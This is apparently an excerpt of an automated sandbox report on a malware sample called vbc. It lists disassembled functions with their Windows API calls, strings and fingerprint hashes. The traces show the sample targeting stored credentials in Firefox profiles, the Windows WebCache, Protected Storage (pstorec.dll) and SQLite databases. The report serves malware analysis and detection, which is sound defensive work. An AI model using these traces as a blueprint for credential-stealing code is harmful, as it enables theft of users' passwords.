                                                                                                                                                    APIs
                                                                                                                                                    • CreateFileW.KERNELBASE(?,-7FBEAA6E,00000003,00000000,?,?,00000000), ref: 00415C86
                                                                                                                                                    • CreateFileA.KERNEL32(?,-7FBEAA6E,00000003,00000000,00415512,00415512,00000000), ref: 00415C9E
                                                                                                                                                    • GetLastError.KERNEL32 ref: 00415CAD
                                                                                                                                                    • free.MSVCRT(?), ref: 00415CBA
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateFile$ErrorLastfree
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 77810686-0
                                                                                                                                                    • Opcode ID: d3d8bbc7ba5a79f8a342b38920b53c153f9ef9857e0a0710124ad1068db44a69
                                                                                                                                                    • Instruction ID: e414679dc355763f7cb5844f7b2dc3c916de6b309c6ec43d815c5638ef366406
                                                                                                                                                    • Opcode Fuzzy Hash: d3d8bbc7ba5a79f8a342b38920b53c153f9ef9857e0a0710124ad1068db44a69
                                                                                                                                                    • Instruction Fuzzy Hash: 7741D0B1508701EFE7109F25EC4169BBBE5EFC4324F14892EF49596290E378D9848B96
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040F026 Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 57COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • memset.MSVCRT ref: 0040F042
                                                                                                                                                    • memset.MSVCRT ref: 0040F057
                                                                                                                                                      • Part of subcall function 00412270: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 004122AA
                                                                                                                                                      • Part of subcall function 0040719A: wcslen.MSVCRT ref: 0040719B
                                                                                                                                                      • Part of subcall function 0040719A: wcscat.MSVCRT ref: 004071B3
                                                                                                                                                    • wcscat.MSVCRT ref: 0040F080
                                                                                                                                                      • Part of subcall function 00412270: memset.MSVCRT ref: 004122C9
                                                                                                                                                      • Part of subcall function 00412270: RegCloseKey.ADVAPI32(?), ref: 00412330
                                                                                                                                                      • Part of subcall function 00412270: wcscpy.MSVCRT ref: 0041233E
                                                                                                                                                    • wcscat.MSVCRT ref: 0040F0A9
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
                                                                                                                                                    • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                                                                                    • API String ID: 1534475566-1174173950
                                                                                                                                                    • Opcode ID: b40f1a29007ee88b205eab30251de60a7177f83a5dcce95581a050599bf5dc33
                                                                                                                                                    • Instruction ID: 125a097a9f26af6413fbc01dcc411eb2579d6a3fd62fad3348166db73649eeaa
                                                                                                                                                    • Opcode Fuzzy Hash: b40f1a29007ee88b205eab30251de60a7177f83a5dcce95581a050599bf5dc33
                                                                                                                                                    • Instruction Fuzzy Hash: BF018EB294021C75DB207B668C86ECF732CDF45358F1044BEB504E7182D9B88E888AA9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00412270 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 77registryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 004121C3: LoadLibraryW.KERNEL32(shell32.dll,0040E314,00000000,?,00000002), ref: 004121D1
                                                                                                                                                      • Part of subcall function 004121C3: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 004121E6
                                                                                                                                                    • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 004122AA
                                                                                                                                                    • memset.MSVCRT ref: 004122C9
                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00412330
                                                                                                                                                    • wcscpy.MSVCRT ref: 0041233E
                                                                                                                                                      • Part of subcall function 00407674: GetVersionExW.KERNEL32(00450DA8,0000001A,00412291), ref: 0040768E
                                                                                                                                                    Strings
                                                                                                                                                    • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 004122E4, 004122F4
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressCloseFolderLibraryLoadPathProcSpecialVersionmemsetwcscpy
                                                                                                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                    • API String ID: 2699640517-2036018995
                                                                                                                                                    • Opcode ID: c9c64e8e2f051e8caefe2aaada980519e2fc3c71178caf599d8c015b906c46d2
                                                                                                                                                    • Instruction ID: c2720df25ff2a98c700ebd4409fa2125fd2182e4a6debc52b8ada4298b6a052e
                                                                                                                                                    • Opcode Fuzzy Hash: c9c64e8e2f051e8caefe2aaada980519e2fc3c71178caf599d8c015b906c46d2
                                                                                                                                                    • Instruction Fuzzy Hash: 29110831800114BAEB24E7599E4EEEF737CEB05304F5100E7F914E2151E6B85FE5969E
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00411A13 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • wcschr.MSVCRT ref: 00411A2D
                                                                                                                                                    • _snwprintf.MSVCRT ref: 00411A52
                                                                                                                                                    • WritePrivateProfileStringW.KERNEL32(?,?,?,004495A0), ref: 00411A70
                                                                                                                                                    • GetPrivateProfileStringW.KERNEL32 ref: 00411A88
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                                                                    • String ID: "%s"
                                                                                                                                                    • API String ID: 1343145685-3297466227
                                                                                                                                                    • Opcode ID: 1379250297118e4f09543b187cbc7d5db4505a0d7fe81e2b8f9beab2005c4772
                                                                                                                                                    • Instruction ID: ae5f1e9df6cd2f4a0780795b96407545f38e06b3c9618b8e9942ee44aab69889
                                                                                                                                                    • Opcode Fuzzy Hash: 1379250297118e4f09543b187cbc7d5db4505a0d7fe81e2b8f9beab2005c4772
                                                                                                                                                    • Instruction Fuzzy Hash: 2101283240521ABAEF219F81EC05FDA3A6AFF04785F104066BA1960161D779C661EB98
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00411140 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloadertimeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,004112EE,?,?,?,?,?,00000000,?), ref: 00411151
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 0041116B
                                                                                                                                                    • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,004112EE,?,?,?,?,?,00000000,?), ref: 0041118E
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressHandleModuleProcProcessTimes
                                                                                                                                                    • String ID: GetProcessTimes$kernel32.dll
                                                                                                                                                    • API String ID: 1714573020-3385500049
                                                                                                                                                    • Opcode ID: 464f22052b3d8a0ba402789ad02750f959a9c2b374b1230dcbafe23b26c1554b
                                                                                                                                                    • Instruction ID: be5b0e9885743e8d30da273d8ef78610b28524ab18dcfae55e11e98fa027414b
                                                                                                                                                    • Opcode Fuzzy Hash: 464f22052b3d8a0ba402789ad02750f959a9c2b374b1230dcbafe23b26c1554b
                                                                                                                                                    • Instruction Fuzzy Hash: 4FF01C35104308AFEB128FA0EC04B967BA9BB08749F048425F608C1671C775C9A0DF58
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0041C9D5 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 165COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memcmp
                                                                                                                                                    • String ID: @ $SQLite format 3
                                                                                                                                                    • API String ID: 1475443563-3708268960
                                                                                                                                                    • Opcode ID: 321c330f537f46145afcffa81e667367735ed72d1b124427cbcabdf079f64c68
                                                                                                                                                    • Instruction ID: bd67d5102a3eb66ea4de4e64a8b31fca419cb069452d494a6197ab8253893597
                                                                                                                                                    • Opcode Fuzzy Hash: 321c330f537f46145afcffa81e667367735ed72d1b124427cbcabdf079f64c68
                                                                                                                                                    • Instruction Fuzzy Hash: D351D1719442149FDF10DF69C8827EAB7F4AF44314F14019BE804EB346E778EA85CB99
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040E0AC Relevance: 7.6, APIs: 5, Instructions: 64windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 0040E0CE
                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 0040E0F7
                                                                                                                                                    • DeleteObject.GDI32(?), ref: 0040E129
                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,00000000,0040E36A), ref: 0040E171
                                                                                                                                                    • LoadIconW.USER32(00000000,00000065), ref: 0040E17A
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ??2@$DeleteHandleIconLoadModuleObject
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 659443934-0
                                                                                                                                                    • Opcode ID: 5c24b57fa0e1cfdf7f3906394f540e2e73f2d4ee2212ac106c4666ba6c8c482e
                                                                                                                                                    • Instruction ID: 1cba439d4a63bd06fd13ecdd31e81b6a0d9710d4e5327182bdbee0994cb59d35
                                                                                                                                                    • Opcode Fuzzy Hash: 5c24b57fa0e1cfdf7f3906394f540e2e73f2d4ee2212ac106c4666ba6c8c482e
                                                                                                                                                    • Instruction Fuzzy Hash: 322193B19012989FDB30EF768C496DEB7A9AF84715F10863BF80CDB241DF794A118B58
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00408FA4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00408B10: OpenProcess.KERNEL32(00000040,00000000,?,00000104,00000000,?,00000104,00000000,00000000,00000104,Microsoft\Windows\WebCache\WebCacheV01.dat), ref: 00408B85
                                                                                                                                                      • Part of subcall function 00408B10: GetCurrentProcess.KERNEL32(00000000,80000000,00000000,00000000), ref: 00408BA4
                                                                                                                                                      • Part of subcall function 00408B10: DuplicateHandle.KERNELBASE(00000000,00000104,00000000), ref: 00408BB1
                                                                                                                                                      • Part of subcall function 00408B10: GetFileSize.KERNEL32(00000000,00000000), ref: 00408BC6
                                                                                                                                                      • Part of subcall function 00408B10: CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000), ref: 00408BF0
                                                                                                                                                      • Part of subcall function 00408B10: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 00408C05
                                                                                                                                                      • Part of subcall function 00408B10: WriteFile.KERNELBASE(?,00000000,00000104,004091EB,00000000), ref: 00408C20
                                                                                                                                                      • Part of subcall function 00408B10: UnmapViewOfFile.KERNEL32(00000000), ref: 00408C27
                                                                                                                                                      • Part of subcall function 00408B10: FindCloseChangeNotification.KERNELBASE(?), ref: 00408C30
                                                                                                                                                    • FindCloseChangeNotification.KERNELBASE(000000FF,000000FF,00000000,?,004091EB,000000FF,00000000,00000104,Microsoft\Windows\WebCache\WebCacheV01.dat), ref: 00409074
                                                                                                                                                      • Part of subcall function 00408D9D: memset.MSVCRT ref: 00408E72
                                                                                                                                                      • Part of subcall function 00408D9D: wcschr.MSVCRT ref: 00408EAA
                                                                                                                                                      • Part of subcall function 00408D9D: memcpy.MSVCRT ref: 00408EDE
                                                                                                                                                    • DeleteFileW.KERNELBASE(?,?,004091EB,000000FF,00000000,00000104,Microsoft\Windows\WebCache\WebCacheV01.dat), ref: 00409095
                                                                                                                                                    • CloseHandle.KERNEL32(000000FF,?,004091EB,000000FF,00000000,00000104,Microsoft\Windows\WebCache\WebCacheV01.dat), ref: 004090BC
                                                                                                                                                      • Part of subcall function 00408C67: memset.MSVCRT ref: 00408CAF
                                                                                                                                                      • Part of subcall function 00408C67: _snwprintf.MSVCRT ref: 00408D49
                                                                                                                                                      • Part of subcall function 00408C67: free.MSVCRT(000000FF,?,000000FF,00000000,00000104,7519F560), ref: 00408D7D
                                                                                                                                                    Strings
                                                                                                                                                    • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 00408FB4
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$Close$ChangeFindHandleNotificationProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                                                                                                                    • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat
                                                                                                                                                    • API String ID: 3931293568-1514811420
                                                                                                                                                    • Opcode ID: 296897d7b9fc56a1ed802aa42710325314df0d67c48e9c21b811ee4e31976f5b
                                                                                                                                                    • Instruction ID: f61eabc5127fffa0127996e1b9e76e3c42d0daca9916cdcd83e0194a9dfe4be1
                                                                                                                                                    • Opcode Fuzzy Hash: 296897d7b9fc56a1ed802aa42710325314df0d67c48e9c21b811ee4e31976f5b
                                                                                                                                                    • Instruction Fuzzy Hash: 10314CB1C006289BCF60DFA5CD855CEFBB8AF40315F1002ABA518B31A2DB756E85CF59
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040CFDE Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _wcsicmpqsort
                                                                                                                                                    • String ID: /nosort$/sort
                                                                                                                                                    • API String ID: 1579243037-1578091866
                                                                                                                                                    • Opcode ID: b8bcc0ce675c29f22b0227198f2ab65a41989cf9845e13ce1ccf23b6e43e1f16
                                                                                                                                                    • Instruction ID: 426287280b2395c37d482f654794667c251e21b6a2c3e86ec69022cc6db77350
                                                                                                                                                    • Opcode Fuzzy Hash: b8bcc0ce675c29f22b0227198f2ab65a41989cf9845e13ce1ccf23b6e43e1f16
                                                                                                                                                    • Instruction Fuzzy Hash: 4821F8317006019FD714AB75C981E55B3A9FF95318F01053EF519A72D2CB7ABC11CB9A
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00409EB8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 004117E3: FreeLibrary.KERNELBASE(?,00409EC4,00000000,004101A5,?,?,?,?,?,0040328B,?), ref: 004117EF
                                                                                                                                                    • LoadLibraryW.KERNELBASE(pstorec.dll,00000000,004101A5,?,?,?,?,?,0040328B,?), ref: 00409EC9
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00409EDC
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                                                                    • String ID: PStoreCreateInstance$pstorec.dll
                                                                                                                                                    • API String ID: 145871493-2881415372
                                                                                                                                                    • Opcode ID: 0c221e4a7068c4d6934d41343829b8b78c46c2a8619205bb2734fd8b0e3e91f3
                                                                                                                                                    • Instruction ID: b7b877f0cca51cf4ed89ca0d343beedc6eb81d3109fbfde12955c258fb57ec89
                                                                                                                                                    • Opcode Fuzzy Hash: 0c221e4a7068c4d6934d41343829b8b78c46c2a8619205bb2734fd8b0e3e91f3
                                                                                                                                                    • Instruction Fuzzy Hash: 4DF0E2713047035BE7206BB99C45B9776E85F40715F10842EB126D16E2DBBCD9808BA9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00442D7A Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ??3@
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 613200358-0
                                                                                                                                                    • Opcode ID: 91284e8d292f34cc8389785a3eba88276cdd8f2cca5db5bcb264024c119ed55e
                                                                                                                                                    • Instruction ID: 4d75bcbf83e2a718e0a773ad5cf6a383805f84e699810b963ae7674306c23c36
                                                                                                                                                    • Opcode Fuzzy Hash: 91284e8d292f34cc8389785a3eba88276cdd8f2cca5db5bcb264024c119ed55e
                                                                                                                                                    • Instruction Fuzzy Hash: 05E080A1705301777A105B36BE55B0313EC3A703423D8041FF40AC3255DEBCC840441C
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0043800C Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 967COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    • only a single result allowed for a SELECT that is part of an expression, xrefs: 004380DE
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memset
                                                                                                                                                    • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                                                                                    • API String ID: 2221118986-1725073988
                                                                                                                                                    • Opcode ID: fea911689c87fcb8dadeea6a797f322e67ae447bf2e03149324d6587d0a0c1b4
                                                                                                                                                    • Instruction ID: 9afff8ac9fdfbc15a9c7ae9a6e2295b57ef319e934304d2411a679509b53bb08
                                                                                                                                                    • Opcode Fuzzy Hash: fea911689c87fcb8dadeea6a797f322e67ae447bf2e03149324d6587d0a0c1b4
                                                                                                                                                    • Instruction Fuzzy Hash: 36826971A00318AFDF25DF69C881AAEBBA1EF08318F14511EFD1597292DB79E841CB94
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00409F53 Relevance: 5.1, APIs: 4, Instructions: 51COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ??2@
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1033339047-0
                                                                                                                                                    • Opcode ID: 0567f08961b2cf397e8b5cffb80cfb7da57dcf973421e34affee400c22969a13
                                                                                                                                                    • Instruction ID: 97910a1e78d05b4995072b8892bf30812772bdb2f497aa37043254e3fee4362a
                                                                                                                                                    • Opcode Fuzzy Hash: 0567f08961b2cf397e8b5cffb80cfb7da57dcf973421e34affee400c22969a13
                                                                                                                                                    • Instruction Fuzzy Hash: AB01DEB16523406FEB58DB39EE67B2A66949B58351F48453EF207C91F6EAB4C840CA08
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0041C702 Relevance: 4.7, APIs: 1, Strings: 2, Instructions: 174COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memset
                                                                                                                                                    • String ID: 5lA$BINARY
                                                                                                                                                    • API String ID: 2221118986-2383938406
                                                                                                                                                    • Opcode ID: 5c1320cbab28b8c6fe770ef48558482079ba1b310d7c10d9b0a426fab7bf5df3
                                                                                                                                                    • Instruction ID: bfb3245fc00688105b1f81726e77846e409aff0e69a2cb21cfce066b793b8303
                                                                                                                                                    • Opcode Fuzzy Hash: 5c1320cbab28b8c6fe770ef48558482079ba1b310d7c10d9b0a426fab7bf5df3
                                                                                                                                                    • Instruction Fuzzy Hash: 52519C719443459FDB21DF68C8C1AEA7BE4AF08351F14446FE859CB381D778D980CBA9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00416492 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 132COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memset
                                                                                                                                                    • String ID: 5lA
                                                                                                                                                    • API String ID: 2221118986-359836612
                                                                                                                                                    • Opcode ID: 10b18d0b29360d5b332a86cd44162c1c7f48b8235d874daa35843e8e1b90a446
                                                                                                                                                    • Instruction ID: 4fa61a6d7a1dab5f23492278920678b1bd769144bcf213aa264db06e5f0c3c50
                                                                                                                                                    • Opcode Fuzzy Hash: 10b18d0b29360d5b332a86cd44162c1c7f48b8235d874daa35843e8e1b90a446
                                                                                                                                                    • Instruction Fuzzy Hash: 2A417AB2500601EFCB30DF64E9848AAB7F6FB08354712892FE54AC7650E738E9C5CB58
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00414E1C Relevance: 4.5, APIs: 3, Instructions: 49fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00414D9F: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00414DC0
                                                                                                                                                      • Part of subcall function 00414D9F: GetLastError.KERNEL32 ref: 00414DD1
                                                                                                                                                      • Part of subcall function 00414D9F: GetLastError.KERNEL32 ref: 00414DD7
                                                                                                                                                    • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 00414E4C
                                                                                                                                                    • GetLastError.KERNEL32 ref: 00414E56
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLast$File$PointerRead
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 839530781-0
                                                                                                                                                    • Opcode ID: 3b8e0b6f2cdf357378df206a5466dbf18c64a2966c614271076d748b4fcb6fba
                                                                                                                                                    • Instruction ID: 78f6fc62e556ae6391f2b7d02d7635eeebb8002b3cc976368f6d55ef40470767
                                                                                                                                                    • Opcode Fuzzy Hash: 3b8e0b6f2cdf357378df206a5466dbf18c64a2966c614271076d748b4fcb6fba
                                                                                                                                                    • Instruction Fuzzy Hash: 20016D36244305BBEB108F65EC45BEB7B6CFB95761F100427F908D6240E774ED908AE9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00414D9F Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00414DC0
                                                                                                                                                    • GetLastError.KERNEL32 ref: 00414DD1
                                                                                                                                                    • GetLastError.KERNEL32 ref: 00414DD7
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLast$FilePointer
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1156039329-0
                                                                                                                                                    • Opcode ID: 77788fb3081b482f24613af2ac918d7e659f5b9ca52062a4a7545bad1632a255
                                                                                                                                                    • Instruction ID: ce6d17c8e1bf95b997c08e1a60c9ed70337bd99ba9d8843779863386e1f48c80
                                                                                                                                                    • Opcode Fuzzy Hash: 77788fb3081b482f24613af2ac918d7e659f5b9ca52062a4a7545bad1632a255
                                                                                                                                                    • Instruction Fuzzy Hash: 16F03936A10119BBCF009F74EC019EA7BA8EB45760B104726E822E6690EB30EA409AD4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004074C6 Relevance: 4.5, APIs: 3, Instructions: 26COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetTempPathW.KERNEL32(00000104,?), ref: 004074DD
                                                                                                                                                    • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004074EF
                                                                                                                                                    • GetTempFileNameW.KERNELBASE(?,00000000,00000000,?), ref: 00407506
